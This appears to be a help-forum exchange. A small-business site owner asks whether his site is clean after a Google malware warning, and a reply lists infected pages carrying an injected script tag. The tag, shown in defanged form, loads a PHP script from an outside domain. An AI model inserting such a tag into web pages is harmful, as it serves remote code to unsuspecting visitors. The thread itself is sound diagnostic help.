Hi there, I have received an email from Google to say that my site has some malicious software etc, I have now removed everything and just want to have a second opinion . Could you please check this site: www.creativesatellite.co.uk and let me know if it is OK now, much appreciated for your help. Alex
on these pages
http:// www . creativesatellite . co . uk/
http:// www . creativesatellite . co . uk/contents/extra.html
http:// www . creativesatellite . co . uk/contents/en-uk/about.html
http:// www . creativesatellite . co . uk/contents/en-uk/d103.html
http:// www . creativesatellite . co . uk/contents/en-uk/d105.html
http:// www . creativesatellite . co . uk/contents/en-uk/d114.html
http:// www . creativesatellite . co . uk/contents/en-uk/d113.html
http:// www . creativesatellite . co . uk/contents/en-uk/d111.html
http:// www . creativesatellite . co . uk/contents/en-uk/d1.html
http:// www . creativesatellite . co . uk/contents/en-uk/d12.html
http:// www . creativesatellite . co . uk/contents/en-uk/d102.html
http:// www . creativesatellite . co . uk/contents/cload.html
http:// www . creativesatellite . co . uk/contents/en-uk/d110.html
http:// www . creativesatellite . co . uk/contents/en-uk/d10.html
http:// www . creativesatellite . co . uk/contents/en-uk/d112.html
http:// www . creativesatellite . co . uk/contents/en-uk/d106.html
http:// www . creativesatellite . co . uk/contents/en-uk/d100.html
http:// www . creativesatellite . co . uk/contents/en-uk/d101.html
http:// www . creativesatellite . co . uk/contents/en-uk/basket.html
http:// www . creativesatellite . co . uk/contents/en-uk/contactus.html
http:// www . creativesatellite . co . uk/contents/en-uk/d107.html
http:// www . creativesatellite . co . uk/contents/en-uk/d108.html
http:// www . creativesatellite . co . uk/contents/en-uk/d104.html
http:// www . creativesatellite . co . uk/contents/en-uk/d11.html
http:// www . creativesatellite . co . uk/index.html
http:// www . creativesatellite . co . uk/contents/en-uk/d119.html
http:// www . creativesatellite . co . uk/contents/en-uk/d118.html
http:// www . creativesatellite . co . uk/contents/en-uk/d101_01.html
http:// www . creativesatellite . co . uk/contents/en-uk/d109.html
this line of code
<sc ript·src=http:// vivazaxo . com/chat/chopy.php·>
between the </head> and <body> tags.



